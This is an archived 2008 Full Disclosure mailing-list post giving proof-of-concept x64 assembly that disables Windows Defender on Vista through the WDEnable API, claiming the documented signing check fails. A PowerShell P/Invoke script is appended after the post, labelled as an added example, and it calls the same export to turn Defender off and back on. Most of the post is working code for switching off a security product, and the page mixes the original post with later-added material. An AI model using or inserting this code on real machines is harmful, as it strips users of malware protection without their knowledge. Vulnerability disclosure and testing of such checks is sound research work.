Full Disclosure mailing list archives

[Wired Security/EOF] Disable Windows Defender (Vista) PoC code


From: <skyout.fd () wired-security net>
Date: Wed, 14 May 2008 18:05:17 +0200


Hey guys,

my friend Izee from the EOF-Project(.net) team has written a
simple PoC that demonstrates how to disable Windows
Defender on Vista (tested with and without SPs on x86/x64)
using the API Microsoft made for exactly that purpose.

The API has the following structure:

--- SNIP ---
HRESULT WDEnable(
        BOOL fEnable
);
---

Something about the parameter(s):

--- SNIP ---
Parameters

        fEnable
                [in] Windows Defender status that the calling
                application wants to set. TRUE enables Windows
                Defender. FALSE disables Windows Defender. 
---

Now the interesting thing: what Microsoft says about the security
of this API:

--- SNIP ---
Remarks

        The application calling this function must run with
        administrator permissions on the local computer. In
        Windows Vista, the user is prompted for administrator
        permission when the application is running with lower
        privileges. Windows Defender also validates proper signing
        of the calling process (and all the loaded modules) before
        allowing the calling application to change the status. If the
        calling process image (or any loaded modules) is not signed
        or is flagged as a threat by the Windows Defender signature,
        then the call fails with the appropriate error code.
---

And here is the code from Izee/EOF that shows that this is a lie and nothing
more. The users get fooled...

--- SNIP ---
        extrn   LoadLibraryA   :proc
        extrn   GetProcAddress :proc
        extrn   ExitProcess    :proc

 .data

        ; Path of the Defender client DLL (relative to the current drive's
        ; root, as in the original); LoadLibraryA appends ".dll" itself.
        l db '\Program Files\Windows Defender\MpClient',0
        ; Name of the export that toggles Windows Defender on/off.
        p db 'WDEnable',0

 .code

 eof proc
        ; x64 calling convention: the caller reserves 32 bytes of shadow
        ; space and keeps rsp 16-byte aligned at each call. rsp is 8 mod 16
        ; on entry, so 28h gives both alignment and shadow space.
        sub  rsp, 28h

        lea  rcx, l                 ; lpLibFileName
        call LoadLibraryA           ; rax = HMODULE of MpClient.dll

        mov  rcx, rax               ; hModule
        lea  rdx, p                 ; lpProcName = "WDEnable"
        call GetProcAddress         ; rax = address of WDEnable

        xor  rcx, rcx               ; fEnable = FALSE: turn Windows Defender off
        call rax                    ; HRESULT WDEnable(FALSE)

        mov  ecx, eax               ; exit code = the HRESULT, so the result is visible
        call ExitProcess
 eof endp
 end
---

News: http://wired-security.net/archive/2008/may/index.php#07_2_052008

Sincerely,
SkyOut/Wired Security in cooperation with Izee/EOF

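The same WDEnable call made from PowerShell, as an added example that is not part of the original post or of Izee/EOF's code. It reports the HRESULT the export returns, so the administrator-permission and code-signing checks described in Microsoft's remarks can be observed directly from an elevated and from a non-elevated, unsigned host process. It assumes MpClient.dll lives under `$env:ProgramFiles\Windows Defender` (the path the PoC uses) and exports `WDEnable` with the documented signature `HRESULT WDEnable(BOOL fEnable)`; `Invoke-WDEnable` is a helper name chosen here.

```powershell
# Added example (not the original PoC): call the documented WDEnable export
# through P/Invoke and show the resulting HRESULT.
# Assumptions: MpClient.dll is at %ProgramFiles%\Windows Defender\MpClient.dll
# and exports HRESULT WDEnable(BOOL fEnable) by name, as the post states.
$dll = Join-Path $env:ProgramFiles 'Windows Defender\MpClient.dll'
if (-not (Test-Path $dll)) { throw "MpClient.dll not found at $dll" }

# DllImport requires a compile-time constant, so the path is spliced into the
# C# source with backslashes doubled for the C# string literal.
$escaped = $dll -replace '\\', '\\'
if (-not ('MpClient' -as [type])) {
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class MpClient {
    // BOOL is a 4-byte int (marshalled from bool); HRESULT is a signed 32-bit int.
    [DllImport("$escaped")]
    public static extern int WDEnable([MarshalAs(UnmanagedType.Bool)] bool fEnable);
}
"@
}

function Invoke-WDEnable {
    param([Parameter(Mandatory)][bool]$Enable)

    $hr = [MpClient]::WDEnable($Enable)

    # HRESULT convention: S_OK is 0, any negative value (severity bit set) is a
    # failure. GetExceptionForHR returns $null for success codes.
    $message = if ($hr -lt 0) {
        [Runtime.InteropServices.Marshal]::GetExceptionForHR($hr).Message
    } else { 'S_OK' }

    [pscustomobject]@{
        Requested = if ($Enable) { 'enable' } else { 'disable' }
        HResult   = ('0x{0:X8}' -f $hr)
        Succeeded = ($hr -ge 0)
        Message   = $message
        Elevated  = ([Security.Principal.WindowsPrincipal] `
                     [Security.Principal.WindowsIdentity]::GetCurrent()
                    ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

# Usage: the first call is what the PoC does, the second restores Defender.
# Run once from an elevated and once from a non-elevated PowerShell and compare
# the HRESULT to what the remarks claim about signing and privilege checks.
Invoke-WDEnable -Enable $false
Invoke-WDEnable -Enable $true
```

Always run the restoring call afterwards on a test machine; the PoC itself leaves Defender disabled and exits.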
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
